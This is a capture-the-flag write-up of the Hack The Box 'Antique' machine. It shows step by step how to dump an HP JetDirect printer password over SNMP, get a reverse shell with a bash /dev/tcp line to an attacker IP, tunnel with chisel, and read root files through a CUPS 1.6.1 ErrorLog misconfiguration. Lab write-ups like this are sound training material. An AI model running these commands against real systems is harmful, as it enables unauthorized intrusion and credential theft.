HTB: Antique

Enumeration

I run nmap and found the port 23 open.

┌─[]─[user@parrot]─[~/htb/antique]
└──╼ ports=$(nmap -p- -T4 -Pn -n 10.129.106.56 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
┌─[user@parrot]─[~/htb/antique]
└──╼ echo $ports 
23
┌─[user@parrot]─[~/htb/antique]
└──╼ nmap -sC -sV -Pn -p$ports 10.129.106.56
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 11:00 BST
Nmap scan report for 10.129.106.56
Host is up (0.038s latency).

PORT   STATE SERVICE VERSION
23/tcp open  telnet?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270: 
|     JetDirect
|     Password:
|   NULL: 
|_    JetDirect

User flag

A quick search on google reveals that HP JetDirect is a printer, and a vulnerability: CVE-2017-2741.

Searching more about this vulnerability and how to exploit it, I found this page that explain how to hack a HP JetDirect printer, and dump the password.

First I confirm that SNMP is running in the port 161/udp:

┌─[user@parrot]─[~/htb/antique/exploits]
└──╼ sudo nmap -sV -sC -sU -p161,162 10.129.106.56
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 13:00 BST
Nmap scan report for 10.129.106.56
Host is up (0.039s latency).

PORT    STATE  SERVICE  VERSION
161/udp open   snmp     SNMPv1 server (public)
162/udp closed snmptrap

SNMP v1 is running, so I tried to dump the password executing the command that appears on the web page linked above:

┌─[user@parrot]─[~]
└──╼ snmpget -v2c -c public 10.129.106.56 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

It seems that the command has worked and has dumped the password in hexadecimal. I converted the hex code to ascii using the xxd command, you can use any hex/ascii converter online, or cyberchef, is just personal preference.

┌─[user@parrot]─[~]
└──╼ echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135" | xxd -r -p
P@ssw0rd@123!!123�q��"2Rbs3CSs��$4�Eu�WGW�(8i	IY�aA�"1&1A5

Now that I know the password, I connected via telnet and I got the user flag:

┌─[✗]─[user@parrot]─[~/htb/antique]
└──╼ telnet 10.129.106.56
Trying 10.129.106.56...
Connected to 10.129.106.56.
Escape character is '^]'.

HP JetDirect

Password: P@ssw0rd@123!!123

Please type "?" for HELP
> exec whoami
lp
> exec ls
telnet.py
user.txt
> 

Root flag

For commodity I want a real shell, so let’s execute a reverse shell on the target.

> exec bash -c 'bash -i >& /dev/tcp/10.10.14.93/4444 0>&1'
 

I receive the shell on the netcat listener and upgraded it:

┌─[user@parrot]─[~]
└──╼ nc -lnvvp 4444
[...]
lp@antique:~$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
lp@antique:~$ export TERM=xterm
export TERM=xterm
lp@antique:~$ ^Z
[1]+  Stopped                 nc -lnvvp 4444
┌─[✗]─[user@parrot]─[~]
└──╼ stty raw -echo; fg
lp@antique:~$

After running linpeas.sh I found the port 631 in open for the localhost:

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      1149/python3        
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 ::1:631                 :::*                    LISTEN      -   

There are other vulnerabilities for priv esc, like the sudo version or polkit (CVE-2021-4034), but the machine creator probably wants us to explore the port 631, so let’s do that.

I downloaded chisel, a tool that will let us setup a tunnel to the target machine. I first downloaded the binary and copy it to the target machine:

┌─[user@parrot]─[~]
└──╼ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz
[...]
┌─[user@parrot]─[~]
└──╼ gunzip chisel_1.7.7_linux_amd64.gz
[...]
┌─[user@parrot]─[~]
└──╼ python3 -m http.server 8080

# download it on the target
lp@antique:~$ wget http://10.10.14.93:8080/chisel_1.7.7_linux_amd64
[...]

Not that the target has the binary, I will create the tunnel. First I opened a chisel server on my machine:

# on my machine
┌─[user@parrot]─[~]
└──╼ ./chisel_1.7.7_linux_amd64 server -p 9000 --reverse

This way chisel server will listen on the port “9000”, the –reverse flag will allow for reverse tunnels, so that a client can open a listening port on our machine. So now I will connect the target:

# on the target
lp@antique:~$ ./chisel_1.7.7_linux_amd64 client 10.10.14.93:9000 R:9001:localhost:631

On the client side (target), we are telling chisel to connect to our machine “10.10.14.93:9000”, and to create a listening on my machine in the port 9001 “R:9001:localhost:631” (reverse tunnel). This way any traffic my machine hits on the port 9001 will be forwarded by chisel to the target machine, and send to port 631 on target from target.

Now we can connect to the web page by searching for “localhost:9001” on our browser.

The target is hosting CUPS, an open-source printing system. I also notice the CUPS versions is 1.6.1.

I search for vulnerabilities of CUPS 1.6.1, and found this page where a Root File Read vulnerability is explained.

It says it is necessary to be in the “lpadmin” group to exploit this vulnerability, so I checked if the user lp, is in that group.

lp@antique:~$ groups
lp lpadmin

The user is in the “lpadmin” group, so I’m able to exploit the vulnerability from this user.

This vulnerability consist in changing the ErrorLog path, because when we visit the error log page on the web, the cupsd daemon (running with setuid root) reads the Error Log path and echoes it as plaintext. I will try to change it to the root flag and make CUPS echo that file.

I searched on metasploit and found this module. Taking a look at it I notice it runs the following command to change the Error Log file:

lp@antique:~$ cupsctl ErrorLog=/root/root.txt

Next, the exploit makes a request to the web interface. The web interface will show the Error Log file content, so I can make a request with “curl”, and check the output:

lp@antique:~$ curl http://localhost:631/admin/log/error_log
b6791365258a05b70f09ec24e27630de

Cool! That’s the flag! 🙂

Scroll to Top